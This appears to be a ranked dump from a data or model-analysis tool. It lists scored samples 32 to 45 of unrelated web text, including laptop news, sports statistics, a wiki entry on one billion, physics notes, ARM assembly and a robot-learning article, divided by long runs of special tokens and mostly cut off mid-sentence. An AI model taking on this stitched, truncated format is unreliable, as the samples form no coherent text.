text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 32; Score = 1179648.0 +<|begin_of_text|>Share + +Dell has never been shy about offering Linux on its devices in order to make fans of the OS happy while shaving a few bucks off the full price. The savings come from users not needing to spend money on the Windows license. Two of the company’s latest models are getting the same treatment with Dell rolling out an XPS 13 and M3800 Developer Edition, both of which come with Ubuntu 14.04.1 installed. + +The M3800 with Ubuntu is available now, and getting rid of Windows 8.1 carves a savings of $101.50 from the price tag. This means the starting price is $1533.50, which is certainly not cheap, but for users planning to replace Windows with Linux anyway, not being forced to spend extra for the OS is a solid deal. + +One major complaint users had about Dell’s previous Ubuntu offering, the XPS 13 Developer Edition, was that they wanted a larger, more powerful model, and Dell is delivering here. The M3800’s 15.6 inch display features a UHD resolution of 3,840 × 2,160. That’s powered by a fourth generation Intel Core i7 quad-core processor, up to 16GB of RAM and NVIDIA Quadro K1100M graphics. + +A minor issue users will have with the Ubuntu version is the fact 14.04.1 does not support the M3800’s Thunderbolt 2.o port. However, Dell is promising that with the upcoming Ubuntu 14.04.2 release, support for it will be added, so users will only have to deal with not having access to the port for a short period of time. + +As for the XPS 13, Dell has not started selling the newest Linux-toting model as of this writing. In a Dell blog post, the company said that the fourth generation XPS 13 will be available soon, though it did not offer an exact release date for the updated version. + +A key selling point of both models is their size, as the XPS 13 starts at a very light 2.6 pounds, and the larger M3800’s base weight is just 4.7 pounds. Those light specifications are maintained on the Ubuntu-based models. No word on how the switch impacts battery life, however.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 33; Score = 1171456.0 +<|begin_of_text|>HISTORICAL SERIES VICTORY PROBABILITIES (UP 1-GAME-NIL) Here's what has happened -- in both the series and the following game -- when an MLB/NBA/NHL team led a best-of-7 series 1 game to nil. "Site" means the site (H=home or V=road) where a team played Game 1: For example, the row in which sport=MLB, round=Finals, and site=V refers to MLB teams with a 1-game-nil MLB World Series lead, having played Game 1 on the road; for a second example, the row in which sport=NHL, round=Semis, and site=H refers to NHL teams with a 1-game-nil NHL Stanley Cup Semifinals-round lead, having played Game 1 at home. Theoretical series victory probability for series-leading team =.65625 (based on theoretical game victory probabilities of.5). Table updated through Fall 2017. sport round site Game 2 rec. series rec. all all all 734-618 (.543) 961-391 (.711) all all H 584-317 (.648) 709-192 (.787) all all V 150-301 (.333) 252-199 (.559) all Finals all 136-122 (.527) 180-78 (.698) all Finals H 107-69 (.608) 134-42 (.761) all Finals V 29-53 (.354) 46-36 (.561) all Semis all 181-157 (.536) 243-95 (.719) all Semis H 136-82 (.624) 168-50 (.771) all Semis V 45-75 (.375) 75-45 (.625) all Qtrs all 223-173 (.563) 290-106 (.732) all Qtrs H 186-93 (.667) 228-51 (.817) all Qtrs V 37-80 (.316) 62-55 (.530) all Prelim all 194-166 (.539) 248-112 (.689) all Prelim H 155-73 (.680) 179-49 (.785) all Prelim V 39-93 (.295) 69-63 (.523) MLB all all 82-91 (.474) 111-62 (.642) MLB all H 56-45 (.554) 68-33 +================================================================================ +Rank = 34; Score = 1155072.0 +<|begin_of_text|>Natural number + +1,000,000,000 (one billion, short scale; one thousand million or milliard, yard,[1] long scale) is the natural number following 999,999,999 and preceding 1,000,000,001. One billion can also be written as b or bn.[2][3] + +In scientific notation, it is written as 1 × 109. The metric prefix giga indicates 1,000,000,000 times the base unit. Its symbol is G. + +One billion years may be called eon/aeon in astronomy or geology. + +Previously in British English (but not in American English), the word "billion" referred exclusively to a million millions (1,000,000,000,000). However, this is no longer common, and the word has been used to mean one thousand million (1,000,000,000) for several decades.[4] + +The term milliard can also be used to refer to 1,000,000,000; whereas "milliard" is seldom used in English,[5] variations on this name often appear in other languages. + +In the South Asian numbering system, it is known as 100 crore or 1 arab. + +Visualization of powers of ten from one to 1 billion + +Sense of scale [ edit ] + +The facts below give a sense of how large 1,000,000,000 (109) is in the context of time according to current scientific evidence: + +Time [ edit ] + +10 9 seconds is 114 days short of 32 calendar years (≈ 31.7 years). + +seconds is 114 days short of 32 calendar years (≈ 31.7 years). More precisely, a billion seconds is exactly 31 years, 8 months, 2 weeks, 1 day, 17 hours, 46 minutes, and 40 seconds. + +About 10 9 minutes ago, the Roman Empire was flourishing and Christianity was emerging. (10 9 minutes is roughly 1,901 years.) + +minutes ago, the Roman Empire was flourishing and Christianity was emerging. (10 minutes is roughly 1,901 years.) About 10 9 hours ago, modern human beings and their ancestors were living in the Stone Age (more precisely, the Middle Paleolithic). (10 9 hours is roughly 114,080 years.) + +hours ago, modern human beings and their ancestors were living in the Stone Age (more precisely, the Middle Paleolithic). (10 hours +================================================================================ +Rank = 35; Score = 1146880.0 +<|begin_of_text|>WALTHAM, Mass. -- The film that Boston Celtics coach Brad Stevens showed his team at the start of training camp Tuesday morning had been ready to roll since mid-August, though it underwent too many revisions before and after that point to truly count. + +Since the end of the 2013-14 season in mid-April, Stevens has tortured himself with film study from his team's 25-win campaign and plucked the clips he thought would best demonstrate to his players just what needs to be done this season to take the next step in a rebuilding process that can't go fast enough for anyone involved. + +After months of poring over game film, Brad Stevens is happy to be back at practice, saying, "This is the fun part of my job, this is what I've always enjoyed the most -- watching the team." AP Photo/Michael Dwyer + +Stevens, with a white polo tucked into green basketball shorts, beamed as he stood at center court and watched his players get loose for Tuesday's second session. Twenty-four hours earlier, he had sat a podium in the same gymnasium and apologized to reporters for any rambling answers he was giving during the team's media day because he was so focused on the first team practice that loomed. + +"I've had [the film cut up] for a while. I've been bored," Stevens deadpanned Tuesday before his team's afternoon session. "I told someone the other day -- they said, 'What are you doing?' And I said, 'Paralyzing myself by analysis right now.'" + +Stevens first said he took a week after the season to breathe, then took it back by admitting he cheated and studied film at nights or while traveling during that span. Even if you give him full credit for taking seven days after Boston's season ended, he's still had a mind-numbing 161 days to comb through film for answers to his team's struggles. + +That's 3,864 hours to dissect the team's 57 losses. That's 231,840 minutes to wonder how so many games slipped away in the final minute. + +There had to have been something better on Netflix to watch. + +"It was more about analyzing what didn't go right and figuring out what we could control to make that go better," said Stevens. + +There's a renewed confidence in his voice, not that his ever wavered last season. Even from day one of his surprise hiring, Stevens met everything thrown at him head-on during his first NBA season and battled through +================================================================================ +Rank = 36; Score = 1130496.0 +<|begin_of_text|>Share + +Thereport highlights how global risks are not only interconnected but also have systemic impacts. To manage global risks effectively and build resilience to their impacts, better efforts are needed to understand, measure and foresee the evolution of interdependencies between risks, supplementing traditional risk-management tools with new concepts designed for uncertain environments. If global risks are not effectively addressed, their social, economic and political fallouts could be far-reaching, as exemplified by the continuing impacts of the financial crisis of 2007-2008. + +The systemic nature of our most significant risks calls for procedures and institutions that are globally coordinated yet locally flexible. As international systems of finance, supply chains, health, energy, the Internet and the environment become more complex and interdependent, their level of resilience determines whether they become bulwarks of global stability or amplifiers of cascading shocks. Strengthening resilience requires overcoming collective action challenges through international cooperation among business, government and civil society. + +Box 1: Objectives of the Global Risks 2014 Report The world faces risks that can be addressed only by long-term thinking and collaboration among business, governments and civil society. The Global Risks 2014 report aims to support this process by: exploring the nature of systemic risks + +mapping 31 global risks according to the level of concern they arouse, their likelihood and potential impact, as well as the strength of the interconnections between them + +looking in-depth at the ways in which three constellations of global risk – centred on youth, cyberspace and geopolitics – could interplay and have systemic impact + +Mapping Global Risks in 2014 + +Based on a survey of the World Economic Forum’s multistakeholder communities, the report maps 31 global risks according to level of concern, likelihood and impact and interconnections among them. + +The risks of highest concern to respondents are fiscal crises in key economies, structurally high unemployment and underemployment, and water crises (Table 1). + +Table 1: Ten Global Risks of Highest Concern in 2014 + +No. Global Risk 1 Fiscal crises in key economies 2 Structurally high unemployment/underemployment 3 Water crises 4 Severe income disparity 5 Failure of climate change mitigation and adaptation 6 Greater incidence of extreme weather events (e.g. floods, storms, fires) 7 Global governance failure 8 Food crises 9 Failure of a major financial mechanism/institution 10 Profound political and social instability + +Source: Global Risks Perception Survey 2013-2014. +================================================================================ +Rank = 37; Score = 1114112.0 +<|begin_of_text|>7 + +Put In Bay, OH 43456 + +(419) 285-2112 + +Started camping here in 2010 and immediately fell in love with the place. SBISP is the best deal on PIB, hotels/houses are very expensive to book, so camping is a great alternative. I am unsure how the crowd is during the week at the SBISP, but during the weekends they are packed. Christmas in July is ALWAYS sold out, so if you plan to camp during that weekend you have to book 6 months in advance. (trust me) Price for camping is very reasonable, basically $65/ campsite, but when you factor in price per person it is around $10/person. Everyone that is staying there is there to party, quiet time is after 10pm. Alcohol, though it states you cannot drink, everyone does, just put it in a red solo cup, the rangers are extremely cool as long as you show them respect, and remember to clean up prior to leaving. SBISP has remained successful because people respect the rules, by doing this, authority figures allow some of the rules to be bent, i.e. drinking. They say 6 people per campsite, and I believe 2 or 3 tents per site, honestly, I have never had a problem, I've rented two sites next to each other with almost 20 people total staying there along with 8 tents set up, again, respect the rules and they look the other way on small things. Bathrooms are alright, remind me of a typical park bathroom, this isn't the Ritz Carlton, but they do have outlets in the bathrooms. Showers have hardly any pressure, but are manageable. They now allow two cars per pad, (extra fee for second car) Campfire wood is few and far between, (you cannot bring wood over from the mainland), you can however purchase some. Only one cab company runs inside SBISP, others pickup/drop-off at the entrance into the grounds. One of the cool things (safety) is that late night dropoffs (1am+), you are greeted by an officer checking to see who you are and where exactly you are staying in SBISP. He is extremely friendly and is just doing his job to keep any unwelcome guest from disturbing the campers, show him some respect. In summary; SBISP is a great cheap alternative that still boast all the same amenities that any other part of the island would offer. I would not think twice +================================================================================ +Rank = 38; Score = 1114112.0 +<|begin_of_text|>Recess + +Fish, reptiles, and even some invertebrates appear to play. But when is it play, and not something else? And why do animals do it? + +During a visit to the National Zoo in Washington, DC, biopsychologist Gordon Burghardt decided to peek in on a Nile soft-shelled turtle its keepers affectionately called “Pigface.” Pigface had been a zoo resident for more than 50 years, and Burghardt had seen him before, but this time, he noticed something a bit curious—Pigface was playing basketball. + +“It was by itself,” recalls Burghardt, currently at the University of Tennessee in Knoxville, and “it had started to knock around” a basketball provided by its keepers. The year was 1994, and play had only rarely and anecdotally been reported in animals other than mammals, but he thought that might be what Pigface was doing. The 1-meter-long turtle exuberantly pushed the ball around its aquatic enclosure, swimming through the water with ease as it batted the ball in front of it with its nose. “If you saw a dog or an otter going around batting a ball, bouncing around and chasing it, and going back and forth and doing it over and over again, we’d have no problem calling it play,” he says. “And that’s what the turtle was doing.” + +More recently, ethologist Jennifer Mather of the University of Lethbridge in Canada learned that two of her octopus research subjects had repeatedly blown jet streams of water at floating empty pill bottles, shooting them across the surface of their tanks at the Seattle Aquarium. “If you give an [octopus] something new, it will grab it in its arms and bring it up to its mouth, probably exploring it chemically,” she says. This would usually happen a couple of times, she adds, until it “knew what it was, and didn’t bother anymore. But these two, it’s like they suddenly thought, ‘Maybe I can do something with this.’ ” + +For Burghardt and Mather and most researchers who have witnessed such bizarre activities in reptiles, fish, and even invertebrates, it is clear that these animals engage in some form of play. But not everyone is convinced. “I personally doubt it,” says behavioral physiologist Bernd Heinrich of the University of Vermont. “I personally have never seen anything I’d call ‘play’ in turtles and was +================================================================================ +Rank = 39; Score = 1105920.0 +<|begin_of_text|>Push it to the Limit! + +Obtain all trophies 0.8% + +Ultra Rare 4.38% + +Ultra Rare + +VS Master + +Defeat all VS characters 0.9% + +Ultra Rare 4.54% + +Ultra Rare + +Secret Master + +Defeat all secret VS characters 0.9% + +Ultra Rare 4.57% + +Ultra Rare + +The End...? + +Watch the ending movie 17.7% + +Rare 22.45% + +Uncommon + +Absolute Finesse + +Score a condor in a recorded official round 1.3% + +Ultra Rare 5.54% + +Very Rare + +Walking Encyclopedia + +Complete the fish encyclopedia 1.8% + +Ultra Rare 6.84% + +Very Rare + +Rank 5 Cleared! + +Clear rank 5 of the challenge tournaments 22.3% + +Rare 27.69% + +Uncommon + +Rank 4 Cleared! + +Clear rank 4 of the challenge tournaments 28.1% + +Rare 34.55% + +Uncommon + +Rank 3 Cleared! + +Clear rank 3 of the challenge tournaments 38.5% + +Rare 47.28% + +Uncommon + +It's a Miracle! + +Score an albatross in a recorded official round 6.1% + +Very Rare 11.22% + +Rare + +My First Hole-in-One! + +Score a hole-in-one in a recorded official round 12.8% + +Very Rare 17.83% + +Rare + +Inspiring Spiral + +Sink the ball with a Spiral Shot in a recorded official round 3.1% + +Ultra Rare 9.77% + +Very Rare + +Bolt from the Blue + +Sink the ball with a Rising Shot in a recorded official round 10.1% + +Very Rare 18.27% + +Rare + +Never Misses the Mark + +Sink the ball with a Homing Shot in a recorded official round 13.3% + +Very Rare 21.48% + +Uncommon + +Full House + +Get all computer-controlled NPCs from challenge + +tournament matches to join the gallery 3.1% + +Ultra Rare 7.24% + +Very Rare + +Top Marks + +Get all the answers right in the Professor's three quizzes 13.0% + +Very Rare 21.23% + +Uncommon + +Rank 2 Cleared! + +Clear rank 2 of the challenge tournaments 49.3% + +Rare 60.84% + +Common + +Rank 1 Cleared! + +Clear rank 1 of the challenge tournaments 64.1% + +Common 76.17% + +Common + +Hop, Skip, and a Jump + +Successfully perform a +================================================================================ +Rank = 40; Score = 1105920.0 +<|begin_of_text|>Embedded processors can be relied upon to be a little quirky. Lately I’ve been playing around with the Raspberry Pi’s BCM2835 processor, which is based on the ARM1176JZF-S core. The “J” stands for Jazelle, a module that permits this processor to execute Java bytecodes directly. As far as I know there’s no open source support for using this, and my guess is that a JIT compiler will perform much better anyway, except perhaps in very RAM-limited systems. The “Z” indicates that this core supports TrustZone, which provides a secure mode switch so that secrets can be kept even from privileged operating system code. The “F” means the core has a floating point unit. Finally, “S” indicates a synthesizable core: one for which ARM licenses the Verilog or VHDL. + +One thing I always like to know is how an embedded processor and its compiler cooperate to get things done; looking at the compiler’s output for some simple math functions is a good way to get started. I have a file of operations of the form: + +long x00 (long x) { return x* 0; } long x01 (long x) { return x* 1; } long x02 (long x) { return x* 2; } long x03 (long x) { return x* 3; }... + +Of course, multiplying by zero, one, and two are boring, but there’s a cute way to multiply by three: + +x03: add r0, r0, r0, asl #1 bx lr + +The computation here is r0 + (r0<<1), but instead of separate shift and add instructions, both operations can be done in a single instruction: ARM supports pre-shifting one operand “for free” as part of ALU operations. I had always considered this to be sort of a bizarre fallout from ARM’s decision to use fixed-size instruction words (gotta use all 32 bits somehow…) so it’s pretty cool to see the compiler putting the shifter to good use. Presumably GCC has a peephole pass that runs over the RTL looking for pairs of operations that can be coalesced. + +Multiplying by four is just (r0<<2) and multiplying by five is r0 + (r0<<2). Multiply-by-six is the first operation that requires more than one ALU instruction and multiply-by-11 is the first one that requires an additional register. GCC (version +================================================================================ +Rank = 41; Score = 1097728.0 +<|begin_of_text|>Amid all the bad news coming out of the NFL lately, one story that emerged from the league is about as uplifting as it gets — even if casual sports fans probably missed it altogether. + +This is the story of Devon Still, the Cincinnati Bengals and a powerful statement in support of anyone affected by pediatric cancer. + +Still is a 25-year-old defensive tackle who was an All-American at Penn State University. The Bengals picked him in the second round of the 2012 NFL Draft, but he hasn't been too great on the field since then, registering just 28 tackles, half a sack and no starts in two seasons with the team. + +The Bengals cut Still in late August, just before the start of the 2014 season. Injuries had dulled his athleticism, according to ESPN, but there was something else weighing him down too: A four-year-old daughter named Leah battling Stage 4 cancer. She's reportedly been given a 50-50 chance of survival. + +So there's Still, in late August, left unemployed by the only NFL team he's ever played for and with a daughter at home who's as likely to die as she is to live. But the Bengals did Still a solid even while cutting him loose; coach Marvin Lewis gave him a spot on the practice squad so he could continue drawing a paycheck to pay for Leah's cancer treatments. + +NFL practice squad players are paid a minimum of $6,300 per week that they stay among the group of 10 players that practices with a team but does not suit up for games. Stay on for a full 17 weeks and you make about $107,000. That's not bad money — but it's nothing compared to the $570,000 minimum salary for NFL players, such as Still, with two years of playing experience, according the site Spotrac, which analyzes sports salaries. + +Still said at the time that he was grateful for the opportunity, given the more pressing concerns in his life. + +"I completely understand where they were coming from," he said last week. "I can't give football 100% right now. In the business aspect they want guys to solely focus on football, which is understandable. We are here to win this city a Super Bowl and right now I am not in a position where I can give football 100% of everything I have." + +But then the Bengals did something even more awesome: They moved Still up to the 53-man active roster this week. + +And the story gets even better — much better. The Bengals announced late Monday +================================================================================ +Rank = 42; Score = 1089536.0 +<|begin_of_text|>Phoenix Coyotes Playoff Chances 2013-2014 Beat Dallas 2-1, lottery seed down 0.4 to 18 89 points 37 30-15 Add your own league How are these numbers calculated? Lottery We are out of the playoffs. Here are the big games and what ifs for draft seeds. + +Although it might be more fun to go down swinging. Big Games Friday 100.0* Lottery seed Washington 4 Chicago 0 +0.2 Dallas 3 St. Louis 0 +0.2 New Jersey 2 NY Islanders 3 (so) -0.1 Saturday 100.0* Lottery seed Phoenix 2 San Jose 3 +0.5 Nashville 7 Chicago 5 +0.1 Sunday 100.0* Lottery seed Phoenix 2 Dallas 1 -1.4 New Jersey 3 Boston 2 +0.3 Minnesota 3 Nashville 7 +0.3 Pittsburgh 2 Ottawa 3 (so) +0.2 Washington 0 Tampa Bay 1 (so) +0.2 Points Chance Will Make Playoffs<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 43; Score = 1089536.0 +<|begin_of_text|>Mass and Weight are two often misused and misunderstood terms in mechanics and fluid mechanics. + +The fundamental relation between mass and weight is defined by Newton's Second Law. Newton's Second Law can be expressed as + +F = m a (1) where F = force (N, lb f ) m = mass (kg, slugs) a = acceleration (m/s2, ft/s2) + +Mass + +Mass is a measure of the amount of material in an object, being directly related to the number and type of atoms present in the object. Mass does not change with a body's position, movement or alteration of its shape, unless material is added or removed. + +an object with mass 1 kg on earth would have the same mass of 1 kg on the moon + +Mass is a fundamental property of an object, a numerical measure of its inertia and a fundamental measure of the amount of matter in the object. + +Weight + +Weight is the gravitational force acting on a body mass. The generic expression of Newton's Second Law (1) can be transformed to express weight as a force by replacing the acceleration - a - with the acceleration of gravity - g - as + +F g = m a g (2) where F g = gravitational force - or weight (N, lb f ) m = mass (kg, slugs) a g = acceleration of gravity on earth (9.81 m/s2, 32.17405 ft/s2) + +Example - The Weight of a Body on Earth vs. Moon + +The acceleration of gravity on the moon is approximately 1/6 of the acceleration of gravity on the earth. The weight of a body with mass 1 kg on the earth can be calculated as + +F g_ earth = (1 kg) (9.81 m/s2) + += 9.81 N + +The weight of the same body on the moon can be calculated as + +F g_ moon = (1 kg) ((9.81 m/s2) / 6) + += 1.64 N + +The handling of mass and weight depends on the systems of units used. The most common unit systems are + +the International System - SI + +the British Gravitational System - BG + +the English Engineering System - EE + +One newton is + +≈ the weight of one hundred grams - 101.972 gf (g F ) or 0.101972 kgf (kg F or kilopond - kp (pondus is latin for weight)) + +) or 0.101972 kgf ( +================================================================================ +Rank = 44; Score = 1064960.0 +<|begin_of_text|>Let’s think about numbers. I’ve been inserting Kickstarter messages into my Quick Tips, but this post is about Kickstarter. Or, about their mistreatment of numbers. There’s no scandal, just those little inconsistencies that the experienced programmer notices because they have made the same mistakes. Perl 6 has features to make this easier. + +First, here’s the current state of my Kickstarter campaign for the Learning Perl 6 book. The first image is from the daily email they send me and the second is the dashboard on the website. + +The metrics aren’t from the same instant, as you see from looking at the number of backers and the funding level. But, notice that the higher amount and higher backers has the lower percentage. Most of you probably immediately recognize this as two different strategies in turning Real numbers in Integers. + +Funding Goal Decimal Reported Method 36,254 37,000 0.97983783783 97 Truncating 36,088 37,000 0.97535135135 98 Rounding + +These differences seem small, but for the person running the campaign they can provide a moment of panic. If I see the higher percentage first then see the lower percentage, I wonder if people cancelled or adjusted their pledge. This is especially troubling when you get close to the end of a campaign because there are bad actors out there you like to give you that last little bit then dispute the charge later (and Kickstarter then charges my credit card to pay them back). And, there are plenty of Kickstarter spammers who back your project hoping you’ll back theirs, then cancel their pledge when you don’t. I know, weird. + +Your pledge is just that. No money changes hands until the pledge total goes over the minimum funding. I haven’t captured any of that money, and I only expect to get about 90% of it through various credit card issues once Kickstarter collects in about two weeks. + +But, back to programming. When you see two different ways of getting the same number, you know you have a code smell. We know that there should be a common routine that handles it. It seems simple to divide two numbers, but obviously it isn’t. There are other things, like normalization, that come into play. + +Let’s divide some numbers in Perl 6. First, there’s the division operator and it might look like it divides two numbers. If I look at the type of thingy in $n, I see that it’s a Rat (rational number). If I look at the. +================================================================================ +Rank = 45; Score = 1040384.0 +<|begin_of_text|>Share + +Whether it was your favorite toy or the last portion of mashed potatoes, anyone who grew up with a sibling knows that you learn to forcefully stake your claim to what’s rightfully yours. + +It turns out that a similar idea can be applied to robots. + +In a new piece of research — presented at the recent 2017 International Conference on Robotics and Automation (ICRA) — engineers from Google and Carnegie Mellon University demonstrated that robots learn to grasp objects more robustly if another robot can be made to try and snatch it away from them while they’re doing so. + +When one robot is given the task of picking up an object, the researchers made its evil twin (not that they used those words exactly) attempt to grab it from them. If the object isn’t properly held, the rival robot would be successful in its snatch-and-grab effort. Over time, the first robot learns to more securely hold onto its object — and with a vastly accelerated learning time, compared to working this out on its own. + +“Robustness is a challenging problem for robotics,” Lerrel Pinto, a PhD student at Carnegie Mellon’s Robotics Institute told Digital Trends. “You ideally want a robot to be able to transfer what it has learnt to environments that it hasn’t seen before, or even be stable to risks in the environment. Our adversarial formulation allows the robot to learn to adapt to adversaries, and this could allow the robot to work in new environments.” + +The work uses deep learning technology, as well as insights from game theory: the mathematical study of conflict and cooperation, in which one party’s gain can mean the other party’s loss. In this case, a successful grab from the rival robot is recorded as a failure for the robot it grabbed the object from — which triggers a learning experience for the loser. Over time, the robots’ tussles make each of them smarter. + +That sounds like progress — just as long as the robots don’t eventually form a truce and target us with their adversarial AI, we 